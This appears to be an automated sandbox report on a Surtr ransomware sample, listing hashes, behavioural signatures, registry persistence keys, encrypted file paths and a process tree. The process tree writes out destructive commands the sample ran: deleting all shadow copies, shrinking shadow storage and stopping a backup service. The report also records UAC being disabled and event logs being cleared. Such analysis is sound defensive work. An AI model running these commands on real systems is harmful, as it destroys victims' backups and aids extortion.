Analysis
max time kernel: 121s
max time network: 152s
platform: windows10_x64
resource: win10-en-20211208
submitted: 24-12-2021 07:08
Static task: static1
Behavioral task: behavioral1 (Sample: surtr.exe, Resource: win7-en-20211208)
Behavioral task: behavioral2 (Sample: surtr.exe, Resource: win10-en-20211208)
General
Target: surtr.exe
Size: 320KB
MD5: e6fc190168519d6a6c4f1519e9450f0f
SHA1: af2080ddf1064fb80c7b9af942aaabf264441098
SHA256: 8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980
SHA512: 4522d4e3f8a38dbceb30d09ea04ceeacc33bb273d702d706be68405cd4c9492f862f4ae741f4e0140b54203b3db521e96663f9757bb241b1ac63c1eda3ebb6ba
Malware Config
Family: surtr
Extracted: C:\ProgramData\Service\SURTR_README.txt
Extracted: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\SURTR_README.hta
Signatures

Detects Surtr Payload (2 IoCs)
resource / yara_rule:
- behavioral2/memory/3680-116-0x0000000140133F50-mapping.dmp (family_surtr)
- behavioral2/memory/3680-118-0x0000000140000000-0x0000000140136000-memory.dmp (family_surtr)

Surtr
Ransomware family first seen in late 2021.

description / ioc / Process:
- Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" (reg.exe)
Clears Windows event logs (1 TTPs, 64 IoCs)
pid / Process:
4988 wevtutil.exe; 2084 Process not Found; 4236 wevtutil.exe; 4920 wevtutil.exe; 264 Process not Found; 1224 wevtutil.exe; 4184 wevtutil.exe; 4916 wevtutil.exe;
1252 Process not Found; 1216 Process not Found; 4556 Process not Found; 5032 Process not Found; 4360 wevtutil.exe; 4984 wevtutil.exe; 1964 Process not Found; 276 Process not Found;
3520 Process not Found; 3324 Process not Found; 4548 Process not Found; 2332 Process not Found; 4416 Process not Found; 4904 Process not Found; 3724 Process not Found; 280 wevtutil.exe;
4512 wevtutil.exe; 1016 Process not Found; 4488 wevtutil.exe; 5052 Process not Found; 4812 Process not Found; 5024 Process not Found; 4176 Process not Found; 2116 Process not Found;
5000 wevtutil.exe; 3920 Process not Found; 592 Process not Found; 3864 wevtutil.exe; 904 wevtutil.exe; 3720 wevtutil.exe; 4976 Process not Found; 4536 Process not Found;
5116 Process not Found; 4932 Process not Found; 4564 Process not Found; 2300 Process not Found; 4316 Process not Found; 3772 wevtutil.exe; 4012 Process not Found; 3440 wevtutil.exe;
4144 Process not Found; 636 Process not Found; 4416 Process not Found; 1480 Process not Found; 5020 wevtutil.exe; 1068 wevtutil.exe; 4428 wevtutil.exe; 3380 Process not Found;
932 Process not Found; 592 wevtutil.exe; 4904 wevtutil.exe; 4872 wevtutil.exe; 5108 Process not Found; 3124 Process not Found; 816 Process not Found; 4004 Process not Found
Deletes shadow copies (2 TTPs)
Ransomware often targets backup files to inhibit system recovery.

Modifies boot configuration data using bcdedit (1 TTPs, 2 IoCs)
pid / Process:
4776 bcdedit.exe; 1036 bcdedit.exe
Disables Task Manager via registry modification

Disables use of System Restore points (1 TTPs)

resource / yara_rule:
- behavioral2/memory/3680-115-0x0000000140000000-0x0000000140136000-memory.dmp (upx)
- behavioral2/memory/3680-117-0x0000000140000000-0x0000000140136000-memory.dmp (upx)
- behavioral2/memory/3680-118-0x0000000140000000-0x0000000140136000-memory.dmp (upx)
Drops startup file (6 IoCs)
description / ioc / Process:
- File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SURTR_README.hta (cmd.exe)
- File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SURTR_README.hta (cmd.exe)
- File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SURTR_README.txt (net1.exe)
- File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SURTR_README.txt (net1.exe)
- File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Surtr.exe (net.exe)
- File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Surtr.exe (net.exe)
Reads user/profile data of web browsers (2 TTPs)
Infostealers often target stored browser data, which can include saved credentials etc.

Adds Run key to start application (2 TTPs, 8 IoCs)
description / ioc / Process:
- Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svchos1 = "C:\\ProgramData\\Service\\Surtr.exe" (cmd.exe)
- Key created \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run (reg.exe)
- Set value (str) \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000\Software\Microsoft\Windows\CurrentVersion\Run\svchos2 = "C:\\ProgramData\\Service\\Surtr.exe" (reg.exe)
- Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce (reg.exe)
- Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\svchos3 = "C:\\ProgramData\\Service\\Surtr.exe" (reg.exe)
- Key created \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce (cmd.exe)
- Set value (str) \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\svchos4 = "C:\\ProgramData\\Service\\Surtr.exe" (cmd.exe)
- Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run (cmd.exe)
Enumerates connected drives (3 TTPs, 48 IoCs)
Attempts to read the root path of hard drives other than the default C: drive.
description / ioc / Process (every row is "File opened (read-only)"):
\??\J: vssadmin.exe; \??\A: vssadmin.exe; \??\E: surtr.exe; \??\L: surtr.exe; \??\P: surtr.exe; \??\E: vssadmin.exe; \??\G: surtr.exe; \??\B: surtr.exe;
\??\Z: vssadmin.exe; \??\T: vssadmin.exe; \??\V: vssadmin.exe; \??\N: vssadmin.exe; \??\B: vssadmin.exe; \??\K: surtr.exe; \??\I: vssadmin.exe; \??\R: vssadmin.exe;
\??\F: surtr.exe; \??\I: surtr.exe; \??\O: surtr.exe; \??\Q: surtr.exe; \??\R: surtr.exe; \??\T: surtr.exe; \??\Y: vssadmin.exe; \??\W: vssadmin.exe;
\??\P: vssadmin.exe; \??\H: surtr.exe; \??\W: surtr.exe; \??\S: vssadmin.exe; \??\L: vssadmin.exe; \??\Q: vssadmin.exe; \??\H: vssadmin.exe; \??\K: vssadmin.exe;
\??\U: vssadmin.exe; \??\J: surtr.exe; \??\N: surtr.exe; \??\V: surtr.exe; \??\Z: surtr.exe; \??\M: vssadmin.exe; \??\D: vssadmin.exe; \??\G: vssadmin.exe;
\??\X: vssadmin.exe; \??\F: vssadmin.exe; \??\M: surtr.exe; \??\S: surtr.exe; \??\U: surtr.exe; \??\X: surtr.exe; \??\Y: surtr.exe; \??\A: surtr.exe
Suspicious use of SetThreadContext (1 IoCs)
description / pid / Process / procid_target:
- PID 2668 set thread context of 3680 (2668 surtr.exe, procid_target 69)
Drops file in Program Files directory (64 IoCs)
description / ioc / Process:
- File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\images\share_icons2x.png.[[email protected]].SURT (surtr.exe)
- File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\epl-v10.html.[[email protected]].SURT (surtr.exe)
- File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\O365ProPlusR_SubTrial2-ul-oob.xrm-ms.[[email protected]].SURT (surtr.exe)
- File opened for modification C:\Program Files\Microsoft Office\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Microsoft.Mashup.Client.Excel.EditorRibbon.dll.[[email protected]].SURT (surtr.exe)
- File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\INDUST\THMBNAIL.PNG.[[email protected]].SURT (surtr.exe)
- File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.e4.ui.workbench.swt.nl_ja_4.4.0.v20140623020002.jar.[[email protected]].SURT (surtr.exe)
- File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\locale\org-netbeans-modules-profiler_visualvm.jar.[[email protected]].SURT (surtr.exe)
- File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\BCSRuntimeRes.dll.[[email protected]].SURT (surtr.exe)
- File opened for modification C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\de\System.Xml.Linq.Resources.dll.[[email protected]].SURT (surtr.exe)
- File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\ECHO\THMBNAIL.PNG.[[email protected]].SURT (surtr.exe)
- File opened for modification C:\Program Files\VideoLAN\VLC\hrtfs\dodeca_and_7channel_3DSL_HRTF.sofa.[[email protected]].SURT (surtr.exe)
- File opened for modification C:\Program Files\7-Zip\Lang\nb.txt.[[email protected]].SURT (surtr.exe)
- File created C:\Program Files\Java\jre1.8.0_66\SURTR_README.hta (surtr.exe)
- File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\PublisherR_Grace-ppd.xrm-ms.[[email protected]].SURT (surtr.exe)
- File opened for modification C:\Program Files\Microsoft Office\root\Office16\ADDINS\PowerPivot Excel Add-in\Microsoft.Data.Recommendation.Common.dll.[[email protected]].SURT (surtr.exe)
- File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\gtkHandle.png.[[email protected]].SURT (surtr.exe)
- File opened for modification C:\Program Files\Microsoft Office\root\Office16\GFX.DLL.[[email protected]].SURT (surtr.exe)
- File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\RMNSQUE\RMNSQUE.ELM.[[email protected]].SURT (surtr.exe)
- File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\css\main-cef-win8.css.[[email protected]].SURT (surtr.exe)
- File opened for modification C:\Program Files\Microsoft Office\root\Client\api-ms-win-crt-utility-l1-1-0.dll.[[email protected]].SURT (surtr.exe)
- File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\O365HomePremR_Subscription4-ppd.xrm-ms.[[email protected]].SURT (surtr.exe)
- File opened for modification C:\Program Files\Microsoft Office\root\Office16\Library\Analysis\PROCDB.XLAM.[[email protected]].SURT (surtr.exe)
- File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\fr-ma\ui-strings.js.[[email protected]].SURT (surtr.exe)
- File opened for modification C:\Program Files\Mozilla Firefox\browser\features\[email protected].[[email protected]].SURT (surtr.exe)
- File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\assets\Sample Files\Complex Machine.pdf.[[email protected]].SURT (surtr.exe)
- File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.core.ssl.feature_1.0.0.v20140827-1444\META-INF\eclipse.inf.[[email protected]].SURT (surtr.exe)
- File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.equinox.p2.core.feature_1.3.0.v20140523-0116\feature.xml.[[email protected]].SURT (surtr.exe)
- File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.core.databinding.observable.nl_ja_4.4.0.v20140623020002.jar.[[email protected]].SURT (surtr.exe)
- File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\SUMIPNTG\SUMIPNTG.INF.[[email protected]].SURT (surtr.exe)
- File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\Combine_R_RHP.aapp.[[email protected]].SURT (surtr.exe)
- File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\pdf-ownership-variant2.gif.[[email protected]].SURT (surtr.exe)
- File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\tr-tr\ui-strings.js.[[email protected]].SURT (surtr.exe)
- File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\tool\plugin.js.[[email protected]].SURT (surtr.exe)
- File opened for modification C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Fonts\Garamond.xml.[[email protected]].SURT (surtr.exe)
- File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\VisioPro2019R_Grace-ppd.xrm-ms.[[email protected]].SURT (surtr.exe)
- File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\WordR_Trial-ppd.xrm-ms.[[email protected]].SURT (surtr.exe)
- File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\1033\MSSOAPR3.DLL.[[email protected]].SURT (surtr.exe)
- File created C:\Program Files (x86)\Windows NT\Private_DATA.surt (surtr.exe)
- File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\nls\es-es\ui-strings.js.[[email protected]].SURT (surtr.exe)
- File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\hr-hr\ui-strings.js.[[email protected]].SURT (surtr.exe)
- File opened for modification C:\Program Files (x86)\Google\Update\1.3.36.71\goopdateres_bn.dll.[[email protected]].SURT (surtr.exe)
- File opened for modification C:\Program Files\Common Files\microsoft shared\Stationery\ShadesOfBlue.jpg.[[email protected]].SURT (surtr.exe)
- File opened for modification C:\Program Files\Microsoft Office\root\Office16\SkypeSrv\SFBAPPSDK.DLL.[[email protected]].SURT (surtr.exe)
- File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\TRANSLAT\ESEN\WT61ES.LEX.[[email protected]].SURT (surtr.exe)
- File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_gridview_selected-hover.svg.[[email protected]].SURT (surtr.exe)
- File opened for modification C:\Program Files (x86)\Google\Update\1.3.36.71\goopdateres_sv.dll.[[email protected]].SURT (surtr.exe)
- File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\Excel2019R_Grace-ppd.xrm-ms.[[email protected]].SURT (surtr.exe)
- File opened for modification C:\Program Files\VideoLAN\VLC\locale\ky\LC_MESSAGES\vlc.mo.[[email protected]].SURT (surtr.exe)
- File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_checkbox_partialselected-default_18.svg.[[email protected]].SURT (surtr.exe)
- File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Playstore\ro_get.svg.[[email protected]].SURT (surtr.exe)
- File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\fill-sign.png.[[email protected]].SURT (surtr.exe)
- File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\lib\gimap.jar.[[email protected]].SURT (surtr.exe)
- File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.core.commands.nl_zh_4.4.0.v20140623020002.jar.[[email protected]].SURT (surtr.exe)
- File opened for modification C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Fonts\Calibri Light-Constantia.xml.[[email protected]].SURT (surtr.exe)
- File opened for modification C:\Program Files\Windows Defender\es-ES\MsMpResL.dll.mui.[[email protected]].SURT (surtr.exe)
- File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\win7Handle.png.[[email protected]].SURT (surtr.exe)
- File opened for modification C:\Program Files\Microsoft Office\root\Office16\LogoImages\FirstRunLogoSmall.contrast-white_scale-100.png.[[email protected]].SURT (surtr.exe)
- File opened for modification C:\Program Files\VideoLAN\VLC\plugins\logger\libconsole_logger_plugin.dll.[[email protected]].SURT (surtr.exe)
- File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\images\themes\dark\checkmark-2x.png.[[email protected]].SURT (surtr.exe)
- File opened for modification C:\Program Files\7-Zip\Lang\sq.txt.[[email protected]].SURT (surtr.exe)
- File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\SkypeforBusinessR_Retail-ul-phn.xrm-ms.[[email protected]].SURT (surtr.exe)
- File opened for modification C:\Program Files\Microsoft Office\root\Office16\wordvisi.ttf.[[email protected]].SURT (surtr.exe)
- File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\ARCTIC\THMBNAIL.PNG.[[email protected]].SURT (surtr.exe)
- File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Portal\PortalConnectCore.dll.[[email protected]].SURT (surtr.exe)
Creates scheduled task(s) (1 TTPs, 3 IoCs)
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid / Process:
1304 schtasks.exe; 4872 schtasks.exe; 2472 Process not Found

Interacts with shadow copies (2 TTPs, 26 IoCs)
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid / Process (all vssadmin.exe):
508; 4032; 2292; 3796; 3700; 4288; 3324; 1360; 1796; 4132; 4200; 2224; 4308;
2156; 1184; 1188; 4080; 4192; 2928; 3788; 3916; 3772; 1340; 4040; 4152; 4256

Opens file in notepad (likely ransom note) (1 IoCs)
pid / Process:
984 Process not Found
Runs net.exe

Suspicious behavior: EnumeratesProcesses (2 IoCs)
pid / Process:
3680 surtr.exe; 3680 surtr.exe
Suspicious use of AdjustPrivilegeToken (64 IoCs)
description / pid / Process (rows for the same pid are grouped, in report order):
- 2008 vssvc.exe: Token: SeBackupPrivilege; Token: SeRestorePrivilege; Token: SeAuditPrivilege
- 3320 net1.exe: Token: SeSecurityPrivilege; Token: SeBackupPrivilege
- 4528 cmd.exe: Token: SeSecurityPrivilege; Token: SeBackupPrivilege
- 2616 wevtutil.exe: Token: SeSecurityPrivilege; Token: SeBackupPrivilege
- 3048 wevtutil.exe: Token: SeSecurityPrivilege; Token: SeBackupPrivilege
- 4628 cmd.exe: Token: SeSecurityPrivilege; Token: SeBackupPrivilege
- 4608 net.exe: Token: SeSecurityPrivilege; Token: SeBackupPrivilege
- 4548 net.exe: Token: SeSecurityPrivilege; Token: SeBackupPrivilege
- 3860 net1.exe: Token: SeSecurityPrivilege; Token: SeBackupPrivilege
- 1780 net.exe: Token: SeSecurityPrivilege; Token: SeBackupPrivilege
- 4180 net.exe: Token: SeSecurityPrivilege; Token: SeBackupPrivilege
- 5056 net1.exe: Token: SeSecurityPrivilege; Token: SeBackupPrivilege
- 2320 net.exe: Token: SeSecurityPrivilege; Token: SeBackupPrivilege
- 5092 wevtutil.exe: Token: SeSecurityPrivilege; Token: SeBackupPrivilege
- 1608 wevtutil.exe: Token: SeSecurityPrivilege; Token: SeBackupPrivilege
- 1380 net.exe: Token: SeSecurityPrivilege; Token: SeBackupPrivilege
- 4812 wevtutil.exe: Token: SeSecurityPrivilege; Token: SeBackupPrivilege
- 4892 net.exe: Token: SeSecurityPrivilege; Token: SeBackupPrivilege
- 3240 net1.exe: Token: SeSecurityPrivilege; Token: SeBackupPrivilege
- 284 wevtutil.exe: Token: SeSecurityPrivilege; Token: SeBackupPrivilege
- 1488 cmd.exe: Token: SeSecurityPrivilege; Token: SeBackupPrivilege
- 4868 wevtutil.exe: Token: SeSecurityPrivilege; Token: SeBackupPrivilege
- 3088 net1.exe: Token: SeSecurityPrivilege; Token: SeBackupPrivilege
- 3984 net1.exe: Token: SeSecurityPrivilege; Token: SeBackupPrivilege
- 4080 wevtutil.exe: Token: SeSecurityPrivilege; Token: SeBackupPrivilege
- 4996 wevtutil.exe: Token: SeSecurityPrivilege; Token: SeBackupPrivilege
- 4336 wevtutil.exe: Token: SeSecurityPrivilege; Token: SeBackupPrivilege
- 4352 net.exe: Token: SeSecurityPrivilege; Token: SeBackupPrivilege
- 4112 cmd.exe: Token: SeSecurityPrivilege; Token: SeBackupPrivilege
- 3040 wevtutil.exe: Token: SeSecurityPrivilege; Token: SeBackupPrivilege
- 4236 wevtutil.exe: Token: SeSecurityPrivilege; Token: SeBackupPrivilege
- 4476 wevtutil.exe: Token: SeSecurityPrivilege
Suspicious use of WriteProcessMemory (64 IoCs)
description / pid / Process / procid_target (identical consecutive rows are collapsed with their row count):
- PID 2668 wrote to memory of 3680 (2668 surtr.exe, procid_target 69) [7 rows]
- PID 3680 wrote to memory of 2332 (3680 surtr.exe, procid_target 70) [2 rows]
- PID 3680 wrote to memory of 4032 (3680 surtr.exe, procid_target 71) [2 rows]
- PID 3680 wrote to memory of 2260 (3680 surtr.exe, procid_target 72) [2 rows]
- PID 2260 wrote to memory of 1184 (2260 cmd.exe, procid_target 73) [2 rows]
- PID 3680 wrote to memory of 772 (3680 surtr.exe, procid_target 76) [2 rows]
- PID 3680 wrote to memory of 1520 (3680 surtr.exe, procid_target 75) [2 rows]
- PID 3680 wrote to memory of 1732 (3680 surtr.exe, procid_target 74) [2 rows]
- PID 3680 wrote to memory of 3060 (3680 surtr.exe, procid_target 77) [2 rows]
- PID 3680 wrote to memory of 3744 (3680 surtr.exe, procid_target 78) [2 rows]
- PID 3680 wrote to memory of 3984 (3680 surtr.exe, procid_target 79) [2 rows]
- PID 3680 wrote to memory of 3520 (3680 surtr.exe, procid_target 80) [2 rows]
- PID 3680 wrote to memory of 3920 (3680 surtr.exe, procid_target 81) [2 rows]
- PID 3680 wrote to memory of 3344 (3680 surtr.exe, procid_target 82) [2 rows]
- PID 3680 wrote to memory of 3640 (3680 surtr.exe, procid_target 83) [2 rows]
- PID 3680 wrote to memory of 2772 (3680 surtr.exe, procid_target 85) [2 rows]
- PID 3680 wrote to memory of 1472 (3680 surtr.exe, procid_target 84) [2 rows]
- PID 3680 wrote to memory of 2784 (3680 surtr.exe, procid_target 86) [2 rows]
- PID 3680 wrote to memory of 2600 (3680 surtr.exe, procid_target 87) [2 rows]
- PID 3680 wrote to memory of 1336 (3680 surtr.exe, procid_target 88) [2 rows]
- PID 3680 wrote to memory of 1320 (3680 surtr.exe, procid_target 89) [2 rows]
- PID 3680 wrote to memory of 1616 (3680 surtr.exe, procid_target 90) [2 rows]
- PID 3680 wrote to memory of 664 (3680 surtr.exe, procid_target 91) [2 rows]
- PID 3680 wrote to memory of 592 (3680 surtr.exe, procid_target 93) [2 rows]
- PID 3680 wrote to memory of 1176 (3680 surtr.exe, procid_target 92) [2 rows]
- PID 3680 wrote to memory of 1264 (3680 surtr.exe, procid_target 94) [2 rows]
- PID 3680 wrote to memory of 2568 (3680 surtr.exe, procid_target 95) [2 rows]
- PID 3680 wrote to memory of 2392 (3680 surtr.exe, procid_target 96) [2 rows]
- PID 3680 wrote to memory of 2552 (3680 surtr.exe, procid_target 97) [2 rows]
- PID 3680 wrote to memory of 1252 (3680 surtr.exe, procid_target 98) [1 row]
Views/modifies file attributes (1 TTPs, 8 IoCs)
pid / Process:
4176 Process not Found; 940 Process not Found; 5092 Process not Found; 2136 Process not Found; 1804 Process not Found; 4848 Process not Found; 4812 attrib.exe; 264 attrib.exe
Processes
(the bracketed number is the process depth in the tree; children are indented under their parent)

[1] C:\Users\Admin\AppData\Local\Temp\surtr.exe
    command line: "C:\Users\Admin\AppData\Local\Temp\surtr.exe"
    - Suspicious use of SetThreadContext
    - Suspicious use of WriteProcessMemory
    PID: 2668
  [2] C:\Users\Admin\AppData\Local\Temp\surtr.exe
      command line: "C:\Users\Admin\AppData\Local\Temp\surtr.exe"
      - Enumerates connected drives
      - Drops file in Program Files directory
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of WriteProcessMemory
      PID: 3680
    [3] C:\Windows\system32\cmd.exe
        command line: C:\Windows\system32\cmd.exe /c mkdir C:\ProgramData\Service
        PID: 2332
    [3] C:\Windows\system32\cmd.exe
        command line: C:\Windows\system32\cmd.exe /c echo off
        PID: 4032
    [3] C:\Windows\system32\cmd.exe
        command line: C:\Windows\system32\cmd.exe /c chcp 437
        - Suspicious use of WriteProcessMemory
        PID: 2260
      [4] C:\Windows\system32\chcp.com
          command line: chcp 437
          PID: 1184
    [3] C:\Windows\system32\cmd.exe
        command line: C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=D:\ /on=D:\ /maxsize=401MB
        PID: 1732
      [4] C:\Windows\System32\cmd.exe
          command line: C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=D:\ /on=D:\ /maxsize=401MB
          PID: 2456
        [5] C:\Windows\system32\vssadmin.exe
            command line: vssadmin resize shadowstorage /for=D:\ /on=D:\ /maxsize=401MB
            - Enumerates connected drives
            - Interacts with shadow copies
            PID: 4040
    [3] C:\Windows\system32\cmd.exe
        command line: C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin Delete Shadows /all /quiet
        PID: 1520
      [4] C:\Windows\System32\cmd.exe
          command line: C:\Windows\System32\cmd.exe /c vssadmin Delete Shadows /all /quiet
          PID: 3684
        [5] C:\Windows\system32\vssadmin.exe
            command line: vssadmin Delete Shadows /all /quiet
            - Interacts with shadow copies
            PID: 1796
    [3] C:\Windows\system32\cmd.exe
        command line: C:\Windows\system32\cmd.exe /c net stop "Acronis VSS Provider"
        PID: 772
      [4] C:\Windows\system32\net.exe
          command line: net stop "Acronis VSS Provider"
          PID: 344
        [5] C:\Windows\system32\net1.exe
            command line: C:\Windows\system32\net1 stop "Acronis VSS Provider"
            PID: 3968
    [3] C:\Windows\system32\cmd.exe
        command line: C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB
        PID: 3060
      [4] C:\Windows\System32\cmd.exe
          command line: C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB
          PID: 576
        [5] C:\Windows\system32\vssadmin.exe
            command line: vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB
            - Enumerates connected drives
            - Interacts with shadow copies
            PID: 3788
    [3] C:\Windows\system32\cmd.exe
        command line: C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=E:\ /on=E:\ /maxsize=401MB
        PID: 3744
      [4] C:\Windows\System32\cmd.exe
          command line: C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=E:\ /on=E:\ /maxsize=401MB
          PID: 608
        [5] C:\Windows\system32\vssadmin.exe
            command line: vssadmin resize shadowstorage /for=E:\ /on=E:\ /maxsize=401MB
            - Enumerates connected drives
            - Interacts with shadow copies
            PID: 2292
    [3] C:\Windows\system32\cmd.exe
        command line: C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=H:\ /on=H:\ /maxsize=401MB
        PID: 3984
      [4] C:\Windows\System32\cmd.exe
          command line: C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=H:\ /on=H:\ /maxsize=401MB
          PID: 2716
        [5] C:\Windows\system32\vssadmin.exe
            command line: vssadmin resize shadowstorage /for=H:\ /on=H:\ /maxsize=401MB
            - Enumerates connected drives
            - Interacts with shadow copies
            PID: 3324
    [3] C:\Windows\system32\cmd.exe
        command line: C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=G:\ /on=G:\ /maxsize=401MB
        PID: 3520
      [4] C:\Windows\System32\cmd.exe
          command line: C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=G:\ /on=G:\ /maxsize=401MB
          PID: 1612
        [5] C:\Windows\system32\vssadmin.exe
            command line: vssadmin resize shadowstorage /for=G:\ /on=G:\ /maxsize=401MB
            - Enumerates connected drives
            - Interacts with shadow copies
            PID: 1360
    [3] C:\Windows\system32\cmd.exe
        command line: C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=I:\ /on=I:\ /maxsize=401MB
        PID: 3920
      [4] C:\Windows\System32\cmd.exe
          command line: C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=I:\ /on=I:\ /maxsize=401MB
          PID: 3444
        [5] C:\Windows\system32\vssadmin.exe
            command line: vssadmin resize shadowstorage /for=I:\ /on=I:\ /maxsize=401MB
            - Enumerates connected drives
            - Interacts with shadow copies
            PID: 2928
    [3] C:\Windows\system32\cmd.exe
        command line: C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=J:\ /on=J:\ /maxsize=401MB
        PID: 3344
      [4] C:\Windows\System32\cmd.exe
          command line: C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=J:\ /on=J:\ /maxsize=401MB
          PID: 2060
